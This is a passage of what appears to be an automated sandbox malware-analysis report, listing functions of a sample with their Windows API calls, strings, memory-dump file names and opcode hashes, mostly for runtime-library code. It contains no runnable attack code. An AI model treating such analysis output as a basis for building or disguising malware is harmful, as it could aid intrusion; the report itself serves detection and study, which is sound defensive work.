Instruction Fuzzy Hash: B5F12E71E012199BDF14CF6DD8807AEB7B1FF88314F25816AE925AB345D731AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CD550D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CD5508,?,?,00000008,?,?,00CD51A0,00000000), ref: 00CD573A

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0223413eacf277016541d155bd1750696c340df64684092c1a09f5ac21af4258
Instruction ID: dae1e3f521a44d9c78a92cca5785c67ed4422e09431282ca9cc27b50243df7e5
Opcode Fuzzy Hash: 0223413eacf277016541d155bd1750696c340df64684092c1a09f5ac21af4258
Instruction Fuzzy Hash: BCB15B35620A05CFD715CF28C486B657BE1FF45364F298659E9AACF3A1C335EA82CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2CED Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CC2D03

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d487cca29d61ac2eb9f2e5b59c7b335ebc5227e2c4288919067464ab2993471a
Instruction ID: 18e3551dc2571d0acb55df534455a64bb88b43957df969e4b0319adb9f6ece3c
Opcode Fuzzy Hash: d487cca29d61ac2eb9f2e5b59c7b335ebc5227e2c4288919067464ab2993471a
Instruction Fuzzy Hash: D6515DB1A01255CBDB19CF55D9D5BAEBBF4FB48310F24846ED415EB290D3789A80CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CCBB8B Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 098944d39e6b7736bd5e75ac45832909f756cb7b0027568c352c9a95ba9fe1e0
Instruction ID: e56035593712f978180eb45dbf74208b93b6d40bef56094dafb7c055ec8e5f3f
Opcode Fuzzy Hash: 098944d39e6b7736bd5e75ac45832909f756cb7b0027568c352c9a95ba9fe1e0
Instruction Fuzzy Hash: BE41AFB5804218AFDB20DFA9CC9AFAABBB9AF45300F1442DDE41D93211DA359E849F10

Uniqueness

Uniqueness Score: -1.00%

Function 00CC6240 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00CC63BC

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 78bdd8c83a0964a0bf1cecee5d1f36153d5bbee420971261c8a1c4edd491a3f3
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 48518C70604B885ADF38CA28CB96FBE77999F42304F1C041DE493DB2A2C621EF49D346

Uniqueness

Uniqueness Score: -1.00%

Function 00CCCDE1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00CCCDE1

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 9182e84277cc25938829574bf08dc9493ded3762a1032566987c9203b8a047d5
Instruction ID: 2ab4dc618a124e142d2d4e540d4d01de04fdb8ad8447f9066584a0e84b814c53
Opcode Fuzzy Hash: 9182e84277cc25938829574bf08dc9493ded3762a1032566987c9203b8a047d5
Instruction Fuzzy Hash: 19A00270603681DF97508F35AF8970D3BEAAA456D5709506AE40FCE170EB749498AB06

Uniqueness

Uniqueness Score: -1.00%

Function 00CEA251 Relevance: .9, Instructions: 892COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a7d0cc657c6f28aec2f59178bfe91bdefae6b4fc630ce65176fd2ba6bb212a
Instruction ID: f1637df12dfd0141e1ea50f15d223914c6c4ce8560207e9a916d7626c89b68a9
Opcode Fuzzy Hash: d2a7d0cc657c6f28aec2f59178bfe91bdefae6b4fc630ce65176fd2ba6bb212a
Instruction Fuzzy Hash: D0629CA640E3C19FD753CB75889A6D03F72DE2722678E85D9C0C04F177E269284BDB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CD42B1 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f243a1e8f58e3a86e7996e67f8460b10fc5156dfe7aacf3a31ba1c29e2aeb4fd
Instruction ID: 643a2f2803967973e29966c0cbf489e83cec042ccee24dc7d19b0425fabaf85d
Opcode Fuzzy Hash: f243a1e8f58e3a86e7996e67f8460b10fc5156dfe7aacf3a31ba1c29e2aeb4fd
Instruction Fuzzy Hash: 5321B673F2043947770CC47E8C5327DB6E1C78C501745423AE9A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00CD4191 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbbb9c7cd83d42d9065666c8f7eef90f50d4c3287b0518a19360f3f35fbacf57
Instruction ID: 95e76b8cbbb5c4a6129eee236b7cdba79425d2d8156031a60347fd35d049e991
Opcode Fuzzy Hash: cbbb9c7cd83d42d9065666c8f7eef90f50d4c3287b0518a19360f3f35fbacf57
Instruction Fuzzy Hash: 1B117723F30C255B675C816D8C1727E95D6EBD825070F533AD926E7384E9A4DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 00CD64C0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: c5baeed4a2acfa2d8ba0da9f0a97ca74cb30df3ac370b7363449abfd437f1b2f
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: D81108B724008283DA14CA6DE4B85B7A795EAC532072C437BD3624B75CF522EBC5DA00

Uniqueness

Uniqueness Score: -1.00%

Function 00CC82B2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ad719187851a61f309ddbb2cee80a5110ae42387cecf94a10a94091515ac20
Instruction ID: cdfb019d054521f8179317f4a0b614c163848553e98d596f05237332577daff5
Opcode Fuzzy Hash: e0ad719187851a61f309ddbb2cee80a5110ae42387cecf94a10a94091515ac20
Instruction Fuzzy Hash: BFE04632911228EBCB14DB88C948E8AB6ACEB48B40B11009AF501D3140C670DE04DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD5F4 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00CCD638

Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD1EE
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD200
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD212
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD224
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD236
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD248
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD25A
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD26C
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD27E
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD290
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2A2
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2B4
Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2C6

_free.LIBCMT ref: 00CCD62D

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979

_free.LIBCMT ref: 00CCD64F
_free.LIBCMT ref: 00CCD664
_free.LIBCMT ref: 00CCD66F
_free.LIBCMT ref: 00CCD691
_free.LIBCMT ref: 00CCD6A4
_free.LIBCMT ref: 00CCD6B2
_free.LIBCMT ref: 00CCD6BD
_free.LIBCMT ref: 00CCD6F5
_free.LIBCMT ref: 00CCD6FC
_free.LIBCMT ref: 00CCD719
_free.LIBCMT ref: 00CCD731

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ca57dca3ccc914802e197b4cd5d1de37aa852066490173822512b56a90306b71
Instruction ID: ef8e33214b20f5c50c407ec465469dcd56e5f12e4de300c2e5897a8a8fa355f1
Opcode Fuzzy Hash: ca57dca3ccc914802e197b4cd5d1de37aa852066490173822512b56a90306b71
Instruction Fuzzy Hash: 8B316C716047059FEB21AA79D885F6B73E8AF40350F10492DF06AD7191DF30EE85DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00CC912A Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CC9140

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979

_free.LIBCMT ref: 00CC914C
_free.LIBCMT ref: 00CC9157
_free.LIBCMT ref: 00CC9162
_free.LIBCMT ref: 00CC916D
_free.LIBCMT ref: 00CC9178
_free.LIBCMT ref: 00CC9183
_free.LIBCMT ref: 00CC918E
_free.LIBCMT ref: 00CC9199
_free.LIBCMT ref: 00CC91A7

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ae0c780183c660eaa10507fa10f7d26bf089c8d524370acae32e51d1f63da80b
Instruction ID: 1595a64828e0de5bea215e236ccc12a1f524a7be4050d2f9327b5a4038e3a527
Opcode Fuzzy Hash: ae0c780183c660eaa10507fa10f7d26bf089c8d524370acae32e51d1f63da80b
Instruction Fuzzy Hash: D321FC76904109BFCB01EF94C895EDE7BB9FF08340F00466AF9199B161DB31DA48DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00CD2FA2 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6630607049b4f06379e6b900fd26ef143ddee83e0cb9ac45d9046c711fb923c
Instruction ID: 68c5a07d159de0082b44928ad34cdc6002ce69b499563f06be8c90fc61f22854
Opcode Fuzzy Hash: b6630607049b4f06379e6b900fd26ef143ddee83e0cb9ac45d9046c711fb923c
Instruction Fuzzy Hash: 64C1F771E04285EFDB15DF99C881BAD7BB0BF49310F04419AE6519B393C774AB42CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD150 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 445COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 00CBD276
std::_Xinvalid_argument.LIBCPMT ref: 00CBD6F9

Strings

Otu=, xrefs: 00CBD455
invalid stoi argument, xrefs: 00CBD6F4
853321935212, xrefs: 00CBD479
stoi argument out of range, xrefs: 00CBD6EA
OJq=, xrefs: 00CBD466

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: PathTempXinvalid_argumentstd::_
String ID: 853321935212$OJq=$Otu=$invalid stoi argument$stoi argument out of range
API String ID: 3948722134-1220461047
Opcode ID: b4a864fb2e2644bbb5c6f738609d197266c3de72187d479d8cb20bfe950a38ff
Instruction ID: 594c6ef5d334150bcb3d83ecc074882896602587aec63805f1cb7af14f8510d4
Opcode Fuzzy Hash: b4a864fb2e2644bbb5c6f738609d197266c3de72187d479d8cb20bfe950a38ff
Instruction Fuzzy Hash: 2AE115716001485BDF18EF38CD8ABED7B3AAF42344F544618F806876D7EB39DA858792

Uniqueness

Uniqueness Score: -1.00%

Function 00CC3330 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00CC3367
___except_validate_context_record.LIBVCRUNTIME ref: 00CC336F
_ValidateLocalCookies.LIBCMT ref: 00CC33F8
__IsNonwritableInCurrentImage.LIBCMT ref: 00CC3423
_ValidateLocalCookies.LIBCMT ref: 00CC3478

Strings

csm, xrefs: 00CC34A1
csm, xrefs: 00CC340D

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
Opcode ID: fa710ef71abef0066bd26fa32c67b4dfd703fc7cc8c24e1577f679c90c4667ae
Instruction ID: ce5406160797f03ee20ce6f82a2f5e531afcae38da948a174b94df401bd5c7ef
Opcode Fuzzy Hash: fa710ef71abef0066bd26fa32c67b4dfd703fc7cc8c24e1577f679c90c4667ae
Instruction Fuzzy Hash: F151A134A002849FCF15DF29E845FAEBBA5AF44314F14C19DE8159B3A2C772DB02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CCCA0C Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00CCCA36
_free.LIBCMT ref: 00CCCB0F
_free.LIBCMT ref: 00CCCB3C

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: fd7c3fffa32b75272b1854a7c5f07dd0d21b9871d9f355bd1c629eb88af3bf16
Instruction ID: eda9318d4e0493f0af14033eb7310e0f0bdfa2bed600b80f902073e0927fec86
Opcode Fuzzy Hash: fd7c3fffa32b75272b1854a7c5f07dd0d21b9871d9f355bd1c629eb88af3bf16
Instruction Fuzzy Hash: A4515871904209AFDB20AFB5D8C2F6E7BB8EF05310F14456EE52D97182EB358A41EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CC94FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00CC9553
ext-ms-, xrefs: 00CC9567

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: e12b918d41bab609469a3115c0590793d90d94ea28ab80aeb452c0065a4a777a
Instruction ID: 1f65caee0070b877db2fb54462239390b0138990937a6a58556f8fabfa8ffa9b
Opcode Fuzzy Hash: e12b918d41bab609469a3115c0590793d90d94ea28ab80aeb452c0065a4a777a
Instruction Fuzzy Hash: 8021D571A02220EBDB235B25CC48F6E7758DF457A0F250369ED22A72D0DA30EE0197E5

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD370 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CCD338: _free.LIBCMT ref: 00CCD35D

_free.LIBCMT ref: 00CCD3BE

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979

_free.LIBCMT ref: 00CCD3C9
_free.LIBCMT ref: 00CCD3D4
_free.LIBCMT ref: 00CCD428
_free.LIBCMT ref: 00CCD433
_free.LIBCMT ref: 00CCD43E
_free.LIBCMT ref: 00CCD449

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
